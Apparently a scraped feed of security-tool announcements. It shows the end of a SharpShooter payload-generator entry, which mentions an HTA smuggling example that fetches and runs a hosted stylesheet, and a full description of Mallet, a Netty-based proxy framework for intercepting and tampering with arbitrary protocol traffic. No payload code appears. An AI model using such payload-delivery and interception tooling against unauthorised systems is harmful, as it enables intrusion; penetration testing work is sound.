–awlurl example creates a HTA smuggled file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet.Author and CreditsAuthor: Dominic Chell, MDSec ActiveBreach @domchell and @mdseclabsCredits:@tiraniddo: James Forshaw for [email protected]: for [email protected]: Rich Warren for [email protected] and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for [email protected]: Documentation for Squiblydoo and Squiblytwo techniquesDownload SharpShooter

Link: http://feedproxy.google.com/~r/PentestTools/~3/KJriJP1hJA4/sharpshooter-payload-generation.html

Mallet – A Framework For Creating Proxies

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects, and back again, or converting a stream of bytes into a different stream of bytes – think compression and decompression), and higher level logic (actually doing something with those objects).By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid reimplementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.You can get an idea of the available codecs by looking at the Netty source at GitHub, under the codec* directories.Building MalletMallet makes use of Maven, so compiling the code is a matter ofmvn packageTo run it:cd target/java -jar mallet-1.0-SNAPSHOT-spring-boot.jarThere are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so they should be applicable to any app that sends JSON messages.The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.Download Mallet

Link: http://feedproxy.google.com/~r/PentestTools/~3/uEIqUbaTQy4/mallet-framework-for-creating-proxies.html